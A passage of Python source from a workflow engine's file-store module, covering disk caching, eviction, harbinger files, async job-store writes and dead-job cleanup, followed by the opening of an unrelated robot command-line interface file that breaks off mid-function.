it need to be linked to the required location, or copied. If it is copied, can the file
still be retained in cache?
:param str localFilePath: Path to the Source file
:param jobStoreFileID: jobStoreID for the file
:param str callingFunc: Who called this function, 'write' or 'read'
:param bool mutable: See modifiable in readGlobalFile
"""
assert callingFunc in ('read', 'write')
with self.cacheLock() as lockFileHandle:
cachedFile = self.encodedFileID(jobStoreFileID)
# The file to be cached MUST originate in the environment of the TOIL temp directory
if (os.stat(self.localCacheDir).st_dev !=
os.stat(os.path.dirname(localFilePath)).st_dev):
raise InvalidSourceCacheError('Attempting to cache a file across file systems '
'cachedir = %s, file = %s.' % (self.localCacheDir,
localFilePath))
if not localFilePath.startswith(self.localTempDir):
raise InvalidSourceCacheError('Attempting a cache operation on a non-local file '
'%s.' % localFilePath)
if callingFunc == 'read' and mutable:
shutil.copyfile(cachedFile, localFilePath)
fileSize = os.stat(cachedFile).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
cacheInfo.cached += fileSize if cacheInfo.nlink != 2 else 0
if not cacheInfo.isBalanced():
os.remove(cachedFile)
cacheInfo.cached -= fileSize if cacheInfo.nlink != 2 else 0
                    logger.debug('Could not both download ' +
                                 '%s as mutable and add it to the ' % os.path.basename(localFilePath) +
                                 'cache. Hence only the mutable copy was retained.')
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, localFilePath, -1, False)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
# There are two possibilities, read and immutable, and write. both cases do
# almost the same thing except for the direction of the os.link hence we're
# writing them together.
if callingFunc == 'read': # and mutable is inherently False
src = cachedFile
dest = localFilePath
# To mirror behaviour of shutil.copyfile
if os.path.exists(dest):
os.remove(dest)
else: # write
src = localFilePath
dest = cachedFile
try:
os.link(src, dest)
except OSError as err:
if err.errno != errno.EEXIST:
raise
# If we get the EEXIST error, it can only be from write since in read we are
# explicitly deleting the file. This shouldn't happen with the .partial
# logic hence we raise a cache error.
raise CacheError('Attempting to recache a file %s.' % src)
else:
# Chmod the cached file. Cached files can never be modified.
os.chmod(cachedFile, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Return the filesize of cachedFile to the job and increase the cached size
# The values passed here don't matter since rFS looks at the file only for
# the stat
self.returnFileSize(jobStoreFileID, localFilePath, lockFileHandle,
fileAlreadyCached=False)
if callingFunc == 'read':
logger.debug('CACHE: Read file with ID \'%s\' from the cache.' %
jobStoreFileID)
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
def returnFileSize(self, fileStoreID, cachedFileSource, lockFileHandle,
fileAlreadyCached=False):
"""
Returns the fileSize of the file described by fileStoreID to the job requirements pool
if the file was recently added to, or read from cache (A job that reads n bytes from
        cache doesn't really use those n bytes as a part of its job disk since cache is already
accounting for that disk space).
        :param fileStoreID: fileStore ID of the file being added to cache
:param str cachedFileSource: File being added to cache
:param file lockFileHandle: Open file handle to the cache lock file
:param bool fileAlreadyCached: A flag to indicate whether the file was already cached or
not. If it was, then it means that you don't need to add the filesize to cache again.
"""
fileSize = os.stat(cachedFileSource).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
# If the file isn't cached, add the size of the file to the cache pool. However, if the
# nlink threshold is not 1 - i.e. it is 2 (it can only be 1 or 2), then don't do this
# since the size of the file is accounted for by the file store copy.
if not fileAlreadyCached and self.nlinkThreshold == 1:
cacheInfo.cached += fileSize
cacheInfo.sigmaJob -= fileSize
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on returning file size',
logging.WARN)
# Add the info to the job specific cache info
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, cachedFileSource, fileSize, True)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
@staticmethod
def _isHidden(filePath):
"""
This is a function that checks whether filePath is hidden
:param str filePath: Path to the file under consideration
:return: A boolean indicating whether the file is hidden or not.
:rtype: bool
"""
assert isinstance(filePath, (str, bytes))
# I can safely assume I will never see an empty string because this is always called on
# the results of an os.listdir()
return filePath[0] in ('.', '_')
def cleanCache(self, newJobReqs):
"""
Cleanup files in the cache directory to ensure that at least newJobReqs bytes are available
for use.
:param float newJobReqs: the disk space (in bytes) requested by the newly starting job.
"""
with self._CacheState.open(self) as cacheInfo:
# Add the new job's disk requirements to the sigmaJobDisk variable
cacheInfo.sigmaJob += newJobReqs
# Initialize the job state here. We use a partial in the jobSpecificFiles call so
# that this entire thing is pickleable. Based on answer by user Nathaniel Gentile at
# http://stackoverflow.com/questions/2600790
assert self.jobID not in cacheInfo.jobState
cacheInfo.jobState[self.jobID] = {
'jobName': self.jobName,
'jobReqs': newJobReqs,
'jobDir': self.localTempDir,
'jobSpecificFiles': defaultdict(partial(defaultdict,int)),
'filesToFSIDs': defaultdict(set),
'pid': os.getpid(),
'deferredFunctions': []}
# If the caching equation is balanced, do nothing.
if cacheInfo.isBalanced():
return None
# List of deletable cached files. A deletable cache file is one
# that is not in use by any other worker (identified by the number of hard links to
# the file)
allCacheFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
allCacheFiles = [(path, os.stat(path)) for path in allCacheFiles]
# TODO mtime vs ctime
deletableCacheFiles = {(path, inode.st_mtime, inode.st_size)
for path, inode in allCacheFiles
if inode.st_nlink == self.nlinkThreshold}
# Sort in descending order of mtime so the first items to be popped from the list
# are the least recently created.
deletableCacheFiles = sorted(deletableCacheFiles, key=lambda x: (-x[1], -x[2]))
logger.debug('CACHE: Need %s bytes for new job. Detecting an estimated %s (out of a '
'total %s) bytes available for running the new job. The size of the cache '
'is %s bytes.', newJobReqs,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)),
cacheInfo.total, cacheInfo.cached)
logger.debug('CACHE: Evicting files to make room for the new job.')
# Now do the actual file removal
totalEvicted = 0
while not cacheInfo.isBalanced() and len(deletableCacheFiles) > 0:
cachedFile, fileCreateTime, cachedFileSize = deletableCacheFiles.pop()
os.remove(cachedFile)
cacheInfo.cached -= cachedFileSize if self.nlinkThreshold != 2 else 0
totalEvicted += cachedFileSize
assert cacheInfo.cached >= 0
logger.debug('CACHE: Evicted file with ID \'%s\' (%s bytes)' %
(self.decodedFileID(cachedFile), cachedFileSize))
logger.debug('CACHE: Evicted a total of %s bytes. Available space is now %s bytes.',
totalEvicted,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)))
if not cacheInfo.isBalanced():
raise CacheUnbalancedError()
def removeSingleCachedFile(self, fileStoreID):
"""
Removes a single file described by the fileStoreID from the cache forcibly.
"""
with self._CacheState.open(self) as cacheInfo:
cachedFile = self.encodedFileID(fileStoreID)
cachedFileStats = os.stat(cachedFile)
# We know the file exists because this function was called in the if block. So we
# have to ensure nothing has changed since then.
assert cachedFileStats.st_nlink == self.nlinkThreshold, 'Attempting to delete ' + \
'a global file that is in use by another job.'
# Remove the file size from the cached file size if the jobstore is not fileJobStore
# and then delete the file
os.remove(cachedFile)
if self.nlinkThreshold != 2:
cacheInfo.cached -= cachedFileStats.st_size
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on removing single file',
logging.WARN)
self.logToMaster('CACHE: Successfully removed file with ID \'%s\'.' % fileStoreID)
return None
def setNlinkThreshold(self):
# FIXME Can't do this at the top because of loopy (circular) import errors
from toil.jobStores.fileJobStore import FileJobStore
if (isinstance(self.jobStore, FileJobStore) and
os.stat(os.path.dirname(self.localCacheDir)).st_dev == os.stat(
self.jobStore.jobStoreDir).st_dev):
self.nlinkThreshold = 2
else:
self.nlinkThreshold = 1
def _accountForNlinkEquals2(self, localFilePath):
"""
This is a utility function that accounts for the fact that if nlinkThreshold == 2, the
size of the file is accounted for by the file store copy of the file and thus the file
size shouldn't be added to the cached file sizes.
:param str localFilePath: Path to the local file that was linked to the file store copy.
"""
fileStats = os.stat(localFilePath)
assert fileStats.st_nlink >= self.nlinkThreshold
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= fileStats.st_size
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.updateJobReqs(fileStats.st_size, 'remove')
def returnJobReqs(self, jobReqs):
"""
This function returns the effective job requirements back to the pool after the job
completes. It also deletes the local copies of files with the cache lock held.
:param float jobReqs: Original size requirement of the job
"""
# Since we are only reading this job's specific values from the state file, we don't
# need a lock
jobState = self._JobState(self._CacheState._load(self.cacheStateFile
).jobState[self.jobID])
for x in list(jobState.jobSpecificFiles.keys()):
self.deleteLocalFile(x)
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= jobReqs
# assert cacheInfo.isBalanced() # commenting this out for now. God speed
class _CacheState(FileStore._StateFile):
"""
Utility class to read and write the cache lock file. Also for checking whether the
caching equation is balanced or not. It extends the _StateFile class to add other cache
related functions.
"""
@classmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that opens the cache state file and reads it into an object
that is returned to the user in the yield
"""
assert outer is not None
with outer.cacheLock():
cacheInfo = cls._load(outer.cacheStateFile)
yield cacheInfo
cacheInfo.write(outer.cacheStateFile)
def isBalanced(self):
"""
Checks for the inequality of the caching equation, i.e.
cachedSpace + sigmaJobDisk <= totalFreeSpace
Essentially, the sum of all cached file + disk requirements of all running jobs
should always be less than the available space on the system
:return: Boolean for equation is balanced (T) or not (F)
:rtype: bool
"""
return self.cached + self.sigmaJob <= self.total
def purgeRequired(self, jobReqs):
"""
Similar to isBalanced, however it looks at the actual state of the system and
decides whether an eviction is required.
:return: Is a purge required(T) or no(F)
:rtype: bool
"""
return not self.isBalanced()
# totalStats = os.statvfs(self.cacheDir)
# totalFree = totalStats.f_bavail * totalStats.f_frsize
# return totalFree < jobReqs
# Methods related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
:param toil.fileStore.CachingFileStore._CacheState nodeInfo: The state of the node cache as
a _CacheState object
"""
# A list of tuples of (hashed job id, pid or process running job)
registeredJobs = [(jid, state['pid']) for jid, state in list(nodeInfo.jobState.items())]
for jobID, jobPID in registeredJobs:
if not cls._pidExists(jobPID):
jobState = CachingFileStore._JobState(nodeInfo.jobState[jobID])
logger.warning('Detected that job (%s) prematurely terminated. Fixing the state '
'of the cache.', jobState.jobName)
if not batchSystemShutdown:
logger.debug("Returning dead job's used disk to cache.")
# Delete the old work directory if it still exists, to remove unwanted nlinks.
# Do this only during the life of the program and don't do it during the
# batch system cleanup. Leave that to the batch system cleanup code.
if os.path.exists(jobState.jobDir):
shutil.rmtree(jobState.jobDir)
nodeInfo.sigmaJob -= jobState.jobReqs
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState.deferredFunctions)
# Remove job from the cache state file
nodeInfo.jobState.pop(jobID)
def _registerDeferredFunction(self, deferredFunction):
with self._CacheState.open(self) as cacheInfo:
cacheInfo.jobState[self.jobID]['deferredFunctions'].append(deferredFunction)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
class _JobState(object):
"""
This is a utility class to handle the state of a job in terms of its current disk
requirements, working directory, and job specific files.
"""
def __init__(self, dictObj):
assert isinstance(dictObj, dict)
self.__dict__.update(dictObj)
@classmethod
def updateJobSpecificFiles(cls, outer, jobStoreFileID, filePath, fileSize, cached):
"""
This method will update the job specific files in the job state object. It deals with
opening a cache lock file, etc.
:param toil.fileStore.CachingFileStore outer: An instance of CachingFileStore
:param str jobStoreFileID: job store Identifier for the file
:param str filePath: The path to the file
:param float fileSize: The size of the file (may be deprecated soon)
:param bool cached: T : F : None :: cached : not cached : mutably read
"""
with outer._CacheState.open(outer) as cacheInfo:
jobState = cls(cacheInfo.jobState[outer.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, filePath, fileSize, cached)
cacheInfo.jobState[outer.jobID] = jobState.__dict__
def addToJobSpecFiles(self, jobStoreFileID, filePath, fileSize, cached):
"""
This is the method that actually performs the update.
:param jobStoreFileID: job store Identifier for the file
:param filePath: The path to the file
:param fileSize: The size of the file (may be deprecated soon)
:param cached: T : F : None :: cached : not cached : mutably read
"""
# If there is no entry for the jsfID, make one. self.jobSpecificFiles is a default
# dict of default dicts and the absence of a key will return an empty dict
# (equivalent to a None for the if)
if not self.jobSpecificFiles[jobStoreFileID]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
else:
# If there's no entry for the filepath, create one
if not self.jobSpecificFiles[jobStoreFileID][filePath]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
# This should never happen
else:
raise RuntimeError()
# Now add the file to the reverse mapper. This will speed up cleanup and local file
# deletion.
self.filesToFSIDs[filePath].add(jobStoreFileID)
if cached:
self.updateJobReqs(fileSize, 'add')
def updateJobReqs(self, fileSize, actions):
"""
This method will update the current state of the disk required by the job after the
most recent cache operation.
:param fileSize: Size of the last file added/removed from the cache
:param actions: 'add' or 'remove'
"""
assert actions in ('add', 'remove')
multiplier = 1 if actions == 'add' else -1
# If the file was added to the cache, the value is subtracted from the requirements,
# and it is added if the file was removed from the cache.
self.jobReqs -= (fileSize * multiplier)
def isPopulated(self):
return self.__dict__ != {}
class HarbingerFile(object):
"""
Represents the placeholder file that heralds the arrival of a local copy of a file in
the job store.
"""
def __init__(self, fileStore, fileStoreID=None, cachedFileName=None):
"""
Returns the harbinger file name for a cached file, or for a job store ID
:param class fileStore: The 'self' object of the fileStore class
:param str fileStoreID: The file store ID for an input file
:param str cachedFileName: The cache file name corresponding to a given file
"""
# We need either a file store ID, or a cached file name, but not both (XOR).
assert (fileStoreID is None) != (cachedFileName is None)
if fileStoreID is not None:
self.fileStoreID = fileStoreID
cachedFileName = fileStore.encodedFileID(fileStoreID)
else:
self.fileStoreID = fileStore.decodedFileID(cachedFileName)
self.fileStore = fileStore
self.harbingerFileName = '/.'.join(os.path.split(cachedFileName)) + '.harbinger'
def write(self):
self.fileStore.logToMaster('CACHE: Creating a harbinger file for (%s). '
% self.fileStoreID, logging.DEBUG)
with open(self.harbingerFileName + '.tmp', 'w') as harbingerFile:
harbingerFile.write(str(os.getpid()))
# Make this File read only to prevent overwrites
os.chmod(self.harbingerFileName + '.tmp', 0o444)
os.rename(self.harbingerFileName + '.tmp', self.harbingerFileName)
def waitOnDownload(self, lockFileHandle):
"""
This method is called when a readGlobalFile process is waiting on another process to
write a file to the cache.
:param lockFileHandle: The open handle to the cache lock file
"""
while self.exists():
logger.debug('CACHE: Waiting for another worker to download file with ID %s.'
% self.fileStoreID)
# Ensure that the process downloading the file is still alive. The PID will
# be in the harbinger file.
pid = self.read()
if FileStore._pidExists(pid):
# Release the file lock and then wait for a bit before repeating.
flock(lockFileHandle, LOCK_UN)
time.sleep(20)
# Grab the file lock before repeating.
flock(lockFileHandle, LOCK_EX)
else:
# The process that was supposed to download the file has died so we need
# to remove the harbinger.
self._delete()
def read(self):
return int(open(self.harbingerFileName).read())
def exists(self):
return os.path.exists(self.harbingerFileName)
def delete(self):
"""
Acquires the cache lock then attempts to delete the harbinger file.
"""
with self.fileStore.cacheLock():
self._delete()
def _delete(self):
"""
This function assumes you already have the cache lock!
"""
assert self.exists()
self.fileStore.logToMaster('CACHE: Deleting the harbinger file for (%s)' %
self.fileStoreID, logging.DEBUG)
os.remove(self.harbingerFileName)
# Functions related to async updates
def asyncWrite(self):
"""
A function to write files asynchronously to the job store such that subsequent jobs are
not delayed by a long write operation.
"""
try:
while True:
try:
# Block for up to two seconds waiting for a file
args = self.queue.get(timeout=2)
except Empty:
# Check if termination event is signaled
# (set in the event of an exception in the worker)
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting")
continue
# Normal termination condition is getting None from queue
if args is None:
break
inputFileHandle, jobStoreFileID = args
cachedFileName = self.encodedFileID(jobStoreFileID)
# Ensure that the harbinger exists in the cache directory and that the PID
# matches that of this writing thread.
# If asyncWrite is ported to subprocesses instead of threads in the future,
# insert logic here to securely overwrite the harbinger file.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
assert harbingerFile.exists()
assert harbingerFile.read() == int(os.getpid())
# We pass in a fileHandle, rather than the file-name, in case
# the file itself is deleted. The fileHandle itself should persist
# while we maintain the open file handle
with self.jobStore.updateFileStream(jobStoreFileID) as outputFileHandle:
shutil.copyfileobj(inputFileHandle, outputFileHandle)
inputFileHandle.close()
# Remove the file from the lock files
with self._pendingFileWritesLock:
self._pendingFileWrites.remove(jobStoreFileID)
# Remove the harbinger file
harbingerFile.delete()
except:
self._terminateEvent.set()
raise
def _updateJobWhenDone(self):
"""
Asynchronously update the status of the job on the disk, first waiting \
until the writing threads have finished and the input blockFn has stopped \
blocking.
"""
def asyncUpdate():
try:
# Wait till all file writes have completed
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
# Wait till input block-fn returns - in the event of an exception
# this will eventually terminate
self.inputBlockFn()
# Check the terminate event, if set we can not guarantee
# that the workers ended correctly, therefore we exit without
# completing the update
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting before update")
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
finally:
# Indicate that _blockFn can return
# This code will always run
self.updateSemaphore.release()
# The update semaphore is held while the job is written to the job store
try:
self.updateSemaphore.acquire()
t = Thread(target=asyncUpdate)
t.start()
except:
# This is to ensure that the semaphore is released in a crash to stop a deadlock
# scenario
self.updateSemaphore.release()
raise
def _blockFn(self):
self.updateSemaphore.acquire()
self.updateSemaphore.release() # Release so that the block function can be recalled
# This works, because once acquired the semaphore will not be acquired
# by _updateJobWhenDone again.
return
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The directory that will contain the cache state file.
"""
cacheInfo = cls._CacheState._load(os.path.join(dir_, '_cacheState'))
cls.findAndHandleDeadJobs(cacheInfo, batchSystemShutdown=True)
shutil.rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.updateSemaphore.acquire()
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
self.updateSemaphore.release()
class NonCachingFileStore(FileStore):
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.jobName = str(self.jobGraph)
self.localTempDir = os.path.abspath(localTempDir)
self.inputBlockFn = inputBlockFn
self.jobsToDelete = set()
self.loggingMessages = []
self.filesToDelete = set()
super(NonCachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# This will be defined in the `open` method.
self.jobStateFile = None
self.localFileMap = defaultdict(list)
@contextmanager
def open(self, job):
jobReqs = job.disk
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
self.findAndHandleDeadJobs(self.workFlowDir)
self.jobStateFile = self._createJobStateFile()
freeSpace, diskSize = getFileSystemSize(self.localTempDir)
if freeSpace <= 0.1 * diskSize:
logger.warning('Starting job %s with less than 10%% of disk space remaining.',
self.jobName)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Consider modifying the user "
"script to avoid the chance of failure due to incorrectly "
"requested resources. " + logString, level=logging.WARNING)
os.chdir(startingDir)
jobState = self._readJobState(self.jobStateFile)
deferredFunctions = jobState['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the worker
os.remove(self.jobStateFile)
def writeGlobalFile(self, localFileName, cleanup=False):
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
fileStoreID = self.jobStore.writeFile(absLocalFileName, cleanupID)
self.localFileMap[fileStoreID].append(absLocalFileName)
return FileID.forPath(fileStoreID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
else:
localFilePath = self.getLocalTempFileName()
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
self.localFileMap[fileStoreID].append(localFilePath)
return localFilePath
@contextmanager
def readGlobalFileStream(self, fileStoreID):
with self.jobStore.readFileStream(fileStoreID) as f:
yield f
def exportFile(self, jobStoreFileID, dstUrl):
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def deleteLocalFile(self, fileStoreID):
try:
localFilePaths = self.localFileMap.pop(fileStoreID)
except KeyError:
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
else:
for localFilePath in localFilePaths:
os.remove(localFilePath)
def deleteGlobalFile(self, fileStoreID):
try:
self.deleteLocalFile(fileStoreID)
except OSError as e:
if e.errno == errno.ENOENT:
# the file does not exist locally, so no local deletion necessary
pass
else:
raise
self.filesToDelete.add(fileStoreID)
def _blockFn(self):
# there is no asynchronicity in this file store so no need to block at all
return True
def _updateJobWhenDone(self):
try:
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
def __del__(self):
"""
Cleanup function that is run when destroying the class instance. Nothing to do since there
are no async write events.
"""
pass
# Functions related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
Look at the state of all jobs registered in the individual job state files, and handle them
(clean up the disk, and run any registered deferred functions)
:param str nodeInfo: The location of the workflow directory on the node.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
:return:
"""
# A list of tuples of (job name, pid or process running job, registered defer functions)
for jobState in cls._getAllJobStates(nodeInfo):
if not cls._pidExists(jobState['jobPID']):
# using same logic to prevent races as CachingFileStore._setupCache
myPID = str(os.getpid())
cleanupFile = os.path.join(jobState['jobDir'], '.cleanup')
with open(os.path.join(jobState['jobDir'], '.' + myPID), 'w') as f:
f.write(myPID)
while True:
try:
os.rename(f.name, cleanupFile)
except OSError as err:
if err.errno == errno.ENOTEMPTY:
with open(cleanupFile, 'r') as f:
cleanupPID = f.read()
if cls._pidExists(int(cleanupPID)):
# Cleanup your own mess. It's only polite.
os.remove(f.name)
break
else:
os.remove(cleanupFile)
continue
else:
raise
else:
logger.warning('Detected that job (%s) prematurely terminated. Fixing the '
'state of the job on disk.', jobState['jobName'])
if not batchSystemShutdown:
logger.debug("Deleting the stale working directory.")
# Delete the old work directory if it still exists. Do this only during
# the life of the program and don't do it during the batch system
# cleanup. Leave that to the batch system cleanup code.
shutil.rmtree(jobState['jobDir'])
# Run any deferred functions associated with the job
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState['deferredFunctions'])
break
@staticmethod
def _getAllJobStates(workflowDir):
"""
Generator function that deserializes and yields the job state for every job on the node,
one at a time.
:param str workflowDir: The location of the workflow directory on the node.
:return: dict with keys (jobName, jobPID, jobDir, deferredFunctions)
:rtype: dict
"""
jobStateFiles = []
for root, dirs, files in os.walk(workflowDir):
for filename in files:
if filename == '.jobState':
jobStateFiles.append(os.path.join(root, filename))
for filename in jobStateFiles:
try:
yield NonCachingFileStore._readJobState(filename)
except IOError as e:
if e.errno == 2:
# job finished & deleted its jobState file since the jobState files were discovered
continue
else:
raise
@staticmethod
def _readJobState(jobStateFileName):
with open(jobStateFileName, 'rb') as fH:
state = dill.load(fH)
return state
def _registerDeferredFunction(self, deferredFunction):
with open(self.jobStateFile, 'rb') as fH:
jobState = dill.load(fH)
jobState['deferredFunctions'].append(deferredFunction)
with open(self.jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(self.jobStateFile + '.tmp', self.jobStateFile)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
def _createJobStateFile(self):
"""
Create the job state file for the current job and fill in the required
values.
:return: Path to the job state file
:rtype: str
"""
jobStateFile = os.path.join(self.localTempDir, '.jobState')
jobState = {'jobPID': os.getpid(),
'jobName': self.jobName,
'jobDir': self.localTempDir,
'deferredFunctions': []}
with open(jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(jobStateFile + '.tmp', jobStateFile)
return jobStateFile
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow directory that will contain all the individual worker directories.
"""
cls.findAndHandleDeadJobs(dir_, batchSystemShutdown=True)
class FileID(str):
"""
A small wrapper around Python's builtin string class. It is used to represent a file's ID in the file store, and
has a size attribute that is the file's size in bytes. This object is returned by importFile and writeGlobalFile.
"""
def __new__(cls, fileStoreID, *args):
return super(FileID, cls).__new__(cls, fileStoreID)
def __init__(self, fileStoreID, size):
# Don't pass an argument to parent class's __init__.
# In Python 3 we can have super(FileID, self) hand us object's __init__ which chokes on any arguments.
super(FileID, self).__init__()
self.size = size
@classmethod
def forPath(cls, fileStoreID, filePath):
return cls(fileStoreID, os.stat(filePath).st_size)
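# Illustrative sketch (not part of the original module): FileID behaves like a
# plain string, so it can be passed anywhere a file store ID is expected, while
# also carrying the file's size in bytes. With a hypothetical ID value:
#   fid = FileID('files/no-job/example-id', 2048)
#   assert fid == 'files/no-job/example-id' and fid.size == 2048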
def shutdownFileStore(workflowDir, workflowID):
"""
Run the deferred functions from any prematurely terminated jobs still lingering on the system
and carry out any necessary filestore-specific cleanup.
This is a destructive operation and it is important to ensure that there are no other running
processes on the system that are modifying or using the file store for this workflow.
This is intended to be the last call to the file store in a Toil run, called by the
batch system cleanup function upon batch system shutdown.
:param str workflowDir: The path to the cache directory
:param str workflowID: The workflow ID for this invocation of the workflow
"""
cacheDir = os.path.join(workflowDir, cacheDirName(workflowID))
if os.path.exists(cacheDir):
# The presence of the cacheDir suggests this was a cached run. We don't need the cache lock
# for any of this since this is the final cleanup of a job and there should be no other
# conflicting processes using the cache.
CachingFileStore.shutdown(cacheDir)
else:
# This absence of cacheDir suggests otherwise.
NonCachingFileStore.shutdown(workflowDir)
class CacheError(Exception):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
message = 'Unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
Error Raised if the Toil detects the user deletes a cached file
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) deleted explicitly by user. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
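# Worked example (illustrative only, not part of the original module): the
# caching equation enforced by _CacheState.isBalanced() is
#     cached + sigmaJob <= total
# e.g. on a node with total = 100 GiB of cache-eligible disk, cached = 60 GiB
# of cached files and sigmaJob = 30 GiB reserved by running jobs, the equation
# holds; a new job requesting 20 GiB pushes sigmaJob to 50 GiB, so cleanCache()
# must evict at least 10 GiB of deletable cached files, and it raises
# CacheUnbalancedError if it cannot free enough.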
|
text_interface.py
|
from __future__ import print_function
import sys, os, re
import argparse, shutil
from .config import RobotConfig
from .sequencerobot import SequenceRobot
import random, time
import threading
from getch import getch
import yaml
import json
#with open(r'..constants.yaml') as file:
#constants = yaml.load(file, Loader=yaml.FullLoader)
# seed time for better randomness
random.seed(time.time())
class CLI():
def __init__(self, robot):
self.robot = robot
self.prior_cmd, self.prior_args = 'rand', []
self.help_text = ("Possible cmd line arguments include:" +
"\nPlay an action:" +
"\n\t Play a random action: rand" +
"\n\t Play a sequence: s" +
"\n" +
"\nMove individual motors: m" +
"\n" +
"\nReload gestures from json sequences: r" +
"\n" +
"\nAdjust Parameters:" +
"\n\t Adjust speed: e" +
"\n\t Adjust amplitude: a" +
"\n\t Adjust posture: p" +
"\n\t Create a new configuration: c" +
"\n" +
"\nExec python command: man" +
"\n" +
"\nList available gestures: l or ls" +
"\n" +
"\nQuit: q" +
"\n" +
"\nEnter without a cmd to replay the last thing"
)
def print_help(self):
